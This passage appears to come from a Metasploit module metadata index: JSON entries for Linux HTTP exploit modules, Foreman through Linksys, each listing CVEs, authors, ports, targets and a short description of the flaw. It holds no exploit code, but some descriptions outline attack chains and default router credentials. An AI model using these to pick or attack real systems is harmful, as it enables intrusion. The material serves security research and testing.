"name": "Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",
"full_name": "exploit/linux/http/foreman_openstack_satellite_code_exec",
"rank": 600,
"disclosure_date": "2013-06-06",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a code injection vulnerability in the 'create'\n action of 'bookmarks' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier).",
"references": [
"CVE-2013-2121",
"CWE-95",
"OSVDB-94671",
"BID-60833",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=968166",
"URL-http://projects.theforeman.org/issues/2631"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/foreman_openstack_satellite_code_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/foreman_openstack_satellite_code_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/fritzbox_echo_exec": {
"name": "Fritz!Box Webcm Unauthenticated Command Injection",
"full_name": "exploit/linux/http/fritzbox_echo_exec",
"rank": 600,
"disclosure_date": "2014-02-11",
"type": "exploit",
"author": [
"Unknown",
"Fabian Braeunlein <fabian@breaking.systems>",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.\n This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the\n following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,\n 7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,\n 6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270",
"references": [
"CVE-2014-9727",
"OSVDB-103289",
"BID-65520",
"URL-http://www.kapple.de/?p=75",
"URL-https://www.speckmarschall.de/hoere.htm",
"URL-http://pastebin.com/GnMKGmZ2",
"URL-http://www.avm.de/en/Sicherheit/update_list.html",
"URL-http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/linux/http/fritzbox_echo_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/fritzbox_echo_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/github_enterprise_secret": {
"name": "Github Enterprise Default Session Secret And Deserialization Vulnerability",
"full_name": "exploit/linux/http/github_enterprise_secret",
"rank": 600,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"iblue <iblue@exablue.de>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6.\n The first is that the session management uses a hard-coded secret value, which can be\n abused to sign a serialized malicious Ruby object. The second problem is due to the\n use of unsafe deserialization, which allows the malicious Ruby object to be loaded,\n and results in arbitrary remote code execution.\n\n This exploit was tested against version 2.8.0.",
"references": [
"EDB-41616",
"URL-http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html",
"URL-https://enterprise.github.com/releases/2.8.7/notes"
],
"platform": "Linux",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Github Enterprise 2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/github_enterprise_secret.rb",
"is_install_path": true,
"ref_name": "linux/http/github_enterprise_secret",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/gitlist_exec": {
"name": "Gitlist Unauthenticated Remote Command Execution",
"full_name": "exploit/linux/http/gitlist_exec",
"rank": 600,
"disclosure_date": "2014-06-30",
"type": "exploit",
"author": [
"drone",
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command execution vulnerability\n in version 0.4.0 of Gitlist. The problem exists in the handling of a specially\n crafted file name when trying to blame it.",
"references": [
"CVE-2014-4511",
"EDB-33929",
"URL-http://hatriot.github.io/blog/2014/06/29/gitlist-rce/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Gitlist 0.4.0"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/gitlist_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/gitlist_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/goahead_ldpreload": {
"name": "GoAhead Web Server LD_PRELOAD Arbitrary Module Load",
"full_name": "exploit/linux/http/goahead_ldpreload",
"rank": 600,
"disclosure_date": "2017-12-18",
"type": "exploit",
"author": [
"Daniel Hodson <daniel@elttam.com.au>",
"h00die",
"hdm <x@hdm.io>"
],
"description": "This module triggers an arbitrary shared library load vulnerability\n in GoAhead web server versions between 2.5 and that have the CGI module\n enabled.",
"references": [
"CVE-2017-17562",
"URL-https://www.elttam.com.au/blog/goahead/"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Reverse Shell)",
"Automatic (Bind Shell)",
"Automatic (Command)",
"Linux x86",
"Linux x86_64",
"Linux ARM (LE)",
"Linux ARM64",
"Linux MIPS",
"Linux MIPSLE",
"Linux MIPS64",
"Linux MIPS64LE",
"Linux SPARC",
"Linux SPARC64",
"Linux s390x"
],
"mod_time": "2017-12-29 16:17:53 +0000",
"path": "/modules/exploits/linux/http/goahead_ldpreload.rb",
"is_install_path": true,
"ref_name": "linux/http/goahead_ldpreload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/goautodial_3_rce_command_injection": {
"name": "GoAutoDial 3.3 Authentication Bypass / Command Injection",
"full_name": "exploit/linux/http/goautodial_3_rce_command_injection",
"rank": 600,
"disclosure_date": "2015-04-21",
"type": "exploit",
"author": [
"Chris McCurley"
],
"description": "This module exploits a SQL injection flaw in the login functionality for GoAutoDial version 3.3-1406088000 and below, and attempts to perform command injection. This also attempts to retrieve the admin user details, including the cleartext password stored in the underlying database. Command injection will be performed with root privileges.\n\n This module has been tested successfully on GoAutoDial version 3.3-1406088000.",
"references": [
"CVE-2015-2843",
"CVE-2015-2845"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/goautodial_3_rce_command_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/goautodial_3_rce_command_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/gpsd_format_string": {
"name": "Berlios GPSD Format String Vulnerability",
"full_name": "exploit/linux/http/gpsd_format_string",
"rank": 200,
"disclosure_date": "2005-05-25",
"type": "exploit",
"author": [
"Yann Senotier <yann.senotier@cyber-networks.fr>"
],
"description": "This module exploits a format string vulnerability in the Berlios GPSD server.\n This vulnerability was discovered by Kevin Finisterre.",
"references": [
"CVE-2004-1388",
"OSVDB-13199",
"BID-12371",
"URL-http://www.securiteam.com/unixfocus/5LP0M1PEKK.html"
],
"platform": "Linux",
"arch": "x86",
"rport": 2947,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"gpsd-1.91-1.i386.rpm",
"gpsd-1.92-1.i386.rpm",
"gpsd-1.93-1.i386.rpm",
"gpsd-1.94-1.i386.rpm",
"gpsd-1.95-1.i386.rpm",
"gpsd-1.96-1.i386.rpm",
"gpsd-1.97-1.i386.rpm",
"gpsd-2.1-1.i386.rpm",
"gpsd-2.2-1.i386.rpm",
"gpsd-2.3-1.i386.rpm",
"gpsd-2.4-1.i386.rpm",
"gpsd-2.5-1.i386.rpm",
"gpsd-2.6-1.i386.rpm",
"gpsd-2.7-1.i386.rpm",
"gpsd_2.6-1_i386.deb",
"gpsd_2.7-1_i386.deb",
"gpsd_2.7-2_i386.deb",
"SuSE 9.1 compiled 2.0",
"Slackware 9.0 compiled 2.0",
"Slackware 9.0 compiled 2.7",
"Debug "
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/gpsd_format_string.rb",
"is_install_path": true,
"ref_name": "linux/http/gpsd_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/groundwork_monarch_cmd_exec": {
"name": "GroundWork monarch_scan.cgi OS Command Injection",
"full_name": "exploit/linux/http/groundwork_monarch_cmd_exec",
"rank": 600,
"disclosure_date": "2013-03-08",
"type": "exploit",
"author": [
"Johannes Greil",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in GroundWork 6.7.0. This software\n is used for network, application and cloud monitoring. The vulnerability exists in\n the monarch_scan.cgi where user controlled input is used in the perl qx function.\n This allows any remote authenticated attacker, regardless of privileges, to\n inject system commands and gain arbitrary code execution. The module has been tested\n successfully on GroundWork 6.7.0-br287-gw1571 as distributed within the Ubuntu 10.04\n based VM appliance.",
"references": [
"CVE-2013-3502",
"OSVDB-91051",
"US-CERT-VU-345260",
"URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130308-0_GroundWork_Monitoring_Multiple_critical_vulnerabilities_wo_poc_v10.txt"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"GroundWork 6.7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/groundwork_monarch_cmd_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/groundwork_monarch_cmd_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/hadoop_unauth_exec": {
"name": "Hadoop YARN ResourceManager Unauthenticated Command Execution",
"full_name": "exploit/linux/http/hadoop_unauth_exec",
"rank": 600,
"disclosure_date": "2016-10-19",
"type": "exploit",
"author": [
"cbmixx",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module exploits an unauthenticated command execution vulnerability in Apache Hadoop through ResourceManager REST API.",
"references": [
"URL-http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf",
"URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 8088,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-03 01:39:37 +0000",
"path": "/modules/exploits/linux/http/hadoop_unauth_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/hadoop_unauth_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/hp_system_management": {
"name": "HP System Management Anonymous Access Code Execution",
"full_name": "exploit/linux/http/hp_system_management",
"rank": 300,
"disclosure_date": "2012-09-01",
"type": "exploit",
"author": [
"agix"
],
"description": "This module exploits an anonymous remote code execution on HP System Management\n 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on\n a request against /proxy/DataValidation. In order to work HP System Management must\n be configured with Anonymous access enabled.",
"references": [
"OSVDB-91812"
],
"platform": "Linux",
"arch": "x86",
"rport": 2381,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HP System Management 7.1.1 - Linux (CentOS)",
"HP System Management 6.3.0 - Linux (CentOS)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/hp_system_management.rb",
"is_install_path": true,
"ref_name": "linux/http/hp_system_management",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/hp_van_sdn_cmd_inject": {
"name": "HP VAN SDN Controller Root Command Injection",
"full_name": "exploit/linux/http/hp_van_sdn_cmd_inject",
"rank": 600,
"disclosure_date": "2018-06-25",
"type": "exploit",
"author": [
"Matt Bergin",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a hardcoded service token or default credentials\n in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.\n\n A root command injection was discovered in the uninstall action's name\n parameter, obviating the need to use sudo for privilege escalation.\n\n If the service token option TOKEN is blank, USERNAME and PASSWORD will\n be used for authentication. An additional login request will be sent.",
"references": [
"EDB-44951",
"URL-https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2018-12-13 12:01:43 +0000",
"path": "/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb",
"is_install_path": true,
"ref_name": "linux/http/hp_van_sdn_cmd_inject",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/huawei_hg532n_cmdinject": {
"name": "Huawei HG532n Command Injection",
"full_name": "exploit/linux/http/huawei_hg532n_cmdinject",
"rank": 600,
"disclosure_date": "2017-04-15",
"type": "exploit",
"author": [
"Ahmed S. Darwish <darwish.07@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in the Huawei\n HG532n routers provided by TE-Data Egypt, leading to a root shell.\n\n The router's web interface has two kinds of logins, a \"limited\" user:user\n login given to all customers and an admin mode. The limited mode is used\n here to expose the router's telnet port to the outside world through NAT\n port-forwarding.\n\n With telnet now remotely accessible, the router's limited \"ATP command\n line tool\" (served over telnet) can be upgraded to a root shell through\n an injection into the ATP's hidden \"ping\" command.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/8245"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux mipsbe Payload"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/huawei_hg532n_cmdinject",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/ibm_qradar_unauth_rce": {
"name": "IBM QRadar SIEM Unauthenticated Remote Code Execution",
"full_name": "exploit/linux/http/ibm_qradar_unauth_rce",
"rank": 600,
"disclosure_date": "2018-05-28",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "IBM QRadar SIEM has three vulnerabilities in the Forensics web application\n that when chained together allow an attacker to achieve unauthenticated remote code execution.\n\n The first stage bypasses authentication by fixating session cookies.\n The second stage uses those authenticated session cookies to write a file to disk and execute\n that file as the \"nobody\" user.\n The third and final stage occurs when the file executed as \"nobody\" writes an entry into the\n database that causes QRadar to execute a shell script controlled by the attacker as root within\n the next minute.\n Details about these vulnerabilities can be found in the advisories listed in References.\n\n The Forensics web application is disabled in QRadar Community Edition, but the code still works,\n so these vulnerabilities can be exploited in all flavours of QRadar.\n This module was tested with IBM QRadar CE 7.3.0 and 7.3.1. IBM has confirmed versions up to 7.2.8\n patch 12 and 7.3.1 patch 3 are vulnerable.\n Due to payload constraints, this module only runs a generic/shell_reverse_tcp payload.",
"references": [
"CVE-2016-9722",
"CVE-2018-1418",
"CVE-2018-1612",
"URL-https://blogs.securiteam.com/index.php/archives/3689",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/ibm-qradar-siem-forensics.txt",
"URL-https://seclists.org/fulldisclosure/2018/May/54",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg22015797"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/ibm_qradar_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/ibm_qradar_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/imperva_securesphere_exec": {
"name": "Imperva SecureSphere PWS Command Injection",
"full_name": "exploit/linux/http/imperva_securesphere_exec",
"rank": 600,
"disclosure_date": "2018-10-08",
"type": "exploit",
"author": [
"rsp3ar <lukunming<at>gmail.com"
],
"description": "This module exploits a command injection vulnerability in Imperva\n SecureSphere 13.x. The vulnerability exists in the PWS service,\n where Python CGIs do not properly sanitize user-supplied command\n parameters and directly pass them to the corresponding CLI utility,\n leading to command injection. An agent registration credential is\n required to exploit SecureSphere in gateway mode.\n\n This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n 13.2 in pre-ftl mode and unsealed gateway mode.",
"references": [
"EDB-45542"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Imperva SecureSphere 13.0/13.1/13.2"
],
"mod_time": "2019-03-05 21:57:42 +0000",
"path": "/modules/exploits/linux/http/imperva_securesphere_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/imperva_securesphere_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/ipfire_bashbug_exec": {
"name": "IPFire Bash Environment Variable Injection (Shellshock)",
"full_name": "exploit/linux/http/ipfire_bashbug_exec",
"rank": 600,
"disclosure_date": "2014-09-29",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"Claudio Viviani"
],
"description": "IPFire, a free Linux-based open source firewall distribution,\n version <= 2.15 Update Core 82 contains an authenticated remote\n command execution vulnerability via Shellshock in the request headers.",
"references": [
"EDB-34839",
"CVE-2014-6271"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/linux/http/ipfire_bashbug_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ipfire_bashbug_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"exploit_linux/http/ipfire_oinkcode_exec": {
"name": "IPFire proxy.cgi RCE",
"full_name": "exploit/linux/http/ipfire_oinkcode_exec",
"rank": 600,
"disclosure_date": "2017-06-09",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"0x09AL"
],
"description": "IPFire, a free Linux-based open source firewall distribution,\n version < 2.19 Update Core 110 contains a remote command execution\n vulnerability in the ids.cgi page in the OINKCODE field.",
"references": [
"CVE-2017-9757",
"EDB-42149"
],
"platform": "Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/ipfire_oinkcode_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ipfire_oinkcode_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/ipfire_proxy_exec": {
"name": "IPFire proxy.cgi RCE",
"full_name": "exploit/linux/http/ipfire_proxy_exec",
"rank": 600,
"disclosure_date": "2016-05-04",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"Yann CAM"
],
"description": "IPFire, a free Linux-based open source firewall distribution,\n version < 2.19 Update Core 101 contains a remote command execution\n vulnerability in the proxy.cgi page.",
"references": [
"EDB-39765",
"URL-www.ipfire.org/news/ipfire-2-19-core-update-101-released"
],
"platform": "Unix",
"arch": "cmd",
"rport": 444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/ipfire_proxy_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/ipfire_proxy_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/kaltura_unserialize_cookie_rce": {
"name": "Kaltura Remote PHP Code Execution over Cookie",
"full_name": "exploit/linux/http/kaltura_unserialize_cookie_rce",
"rank": 600,
"disclosure_date": "2017-09-12",
"type": "exploit",
"author": [
"Robin Verton <hello@robinverton.de>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits an Object Injection vulnerability in Kaltura.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the context of the web server user.\n\n Kaltura makes use of a hardcoded cookie secret which allows signing\n arbitrary cookie data. After passing this signature check, the base64-\n decoded data is passed to PHP's unserialize() function which allows for\n code execution. The constructed object is again based on the SektionEins\n Zend code execution POP chain PoC. Kaltura versions prior to 13.1.0 are\n affected by this issue.\n\n A valid entry_id (which is required for this exploit) can be obtained\n from any media resource published on the Kaltura installation.\n\n This module was tested against Kaltura 13.1.0-2 installed on Ubuntu 14.04.",
"references": [
"CVE-2017-14143"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-21 14:30:13 +0000",
"path": "/modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kaltura_unserialize_cookie_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/kaltura_unserialize_rce": {
"name": "Kaltura Remote PHP Code Execution",
"full_name": "exploit/linux/http/kaltura_unserialize_rce",
"rank": 600,
"disclosure_date": "2016-03-15",
"type": "exploit",
"author": [
"Security-Assessment.com",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits an Object Injection vulnerability in Kaltura.\n By exploiting this vulnerability, unauthenticated users can execute\n arbitrary code under the context of the web server user.\n\n Kaltura has a module named keditorservices that takes user input\n and then passes it as a parameter to the unserialize() function. The constructed\n object is based on the SektionEins Zend code execution POP chain PoC,\n with a minor modification to ensure Kaltura processes it and the\n Zend_Log function's __destruct() method is called. Kaltura versions\n prior to 11.1.0-2 are affected by this issue.\n\n This module was tested against Kaltura 11.1.0 installed on CentOS 6.8.",
"references": [
"EDB-39563"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/kaltura_unserialize_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/kaltura_unserialize_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/kloxo_sqli": {
"name": "Kloxo SQL Injection and Remote Code Execution",
"full_name": "exploit/linux/http/kloxo_sqli",
"rank": 0,
"disclosure_date": "2014-01-28",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an unauthenticated SQL injection vulnerability affecting Kloxo, as\n exploited in the wild in January 2014. The SQL injection issue can be abused in order to\n retrieve the Kloxo admin cleartext password from the database. With admin access to the\n web control panel, remote PHP code execution can be achieved by abusing the Command Center\n function. The module tries to find the first server in the tree view, unless the server\n information is provided, in which case it executes the payload there.",
"references": [
"URL-https://vpsboard.com/topic/3384-kloxo-installations-compromised/",
"URL-http://www.webhostingtalk.com/showthread.php?p=8996984",
"URL-http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646"
],
"platform": "Unix",
"arch": "cmd",
"rport": 7778,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Kloxo / CentOS"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/kloxo_sqli.rb",
"is_install_path": true,
"ref_name": "linux/http/kloxo_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/lifesize_uvc_ping_rce": {
"name": "LifeSize UVC Authenticated RCE via Ping",
"full_name": "exploit/linux/http/lifesize_uvc_ping_rce",
"rank": 600,
"disclosure_date": "2014-03-21",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "When authenticated as an administrator on LifeSize UVC 1.2.6, an attacker\n can abuse the ping diagnostic functionality to achieve remote command\n execution as the www-data user (or equivalent).",
"references": [
"EDB-32437"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"LifeSize UVC version <= 1.2.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/lifesize_uvc_ping_rce",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_apply_cgi": {
"name": "Linksys WRT54 Access Point apply.cgi Buffer Overflow",
"full_name": "exploit/linux/http/linksys_apply_cgi",
"rank": 500,
"disclosure_date": "2005-09-13",
"type": "exploit",
"author": [
"Raphael Rigo <devel-metasploit@syscall.eu>",
"Julien Tinnes <julien@cr0.org>"
],
"description": "This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.\n According to iDefense, who discovered this vulnerability, all WRT54G versions prior to\n 4.20.7 and all WRT54GS versions prior to 1.05.2 may be affected.",
"references": [
"CVE-2005-2799",
"OSVDB-19389",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305"
],
"platform": "Linux",
"arch": "mipsle",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic",
"Version 1.42.2",
"Version 2.02.6beta1",
"Version 2.02.7_ETSI",
"Version 3.03.6",
"Version 4.00.7",
"Version 4.20.06"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/linksys_apply_cgi.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_apply_cgi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/linksys_e1500_apply_exec": {
"name": "Linksys E1500/E2500 apply.cgi Remote Command Injection",
"full_name": "exploit/linux/http/linksys_e1500_apply_exec",
"rank": 600,
"disclosure_date": "2013-02-05",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind OS command injection vulnerability, there is no output for the\n executed command when using the cmd generic payload. A ping command against a\n controlled system could be used for testing purposes.",
"references": [
"BID-57760",
"EDB-24475",
"OSVDB-89912",
"URL-http://www.s3cur1ty.de/m1adv2013-004"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"CMD",
"Linux mipsel Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/linksys_e1500_apply_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/linksys_e1500_apply_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/linksys_themoon_exec": {
"name": "Linksys E-Series TheMoon Remote Command Injection",
"full_name": "exploit/linux/http/linksys_themoon_exec",
"rank": 600,
"disclosure_date": "2014-02-13",
"type": "exploit",
"author": [
"Johannes Ullrich",
"Rew",
"infodox",
"Michael Messner <devnull@s3cur1ty.de>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command\n injection. This vulnerability was used by the so-called \"TheMoon\" worm. There\n are many Linksys systems that are potentially vulnerable, including E4200, E3200, E3000,\n E2500, E2100L, E2000, E1550, E1500, E1200, E1000, and E900. This module was tested\n successfully against an E1500 v1.0.5.",
"references": [
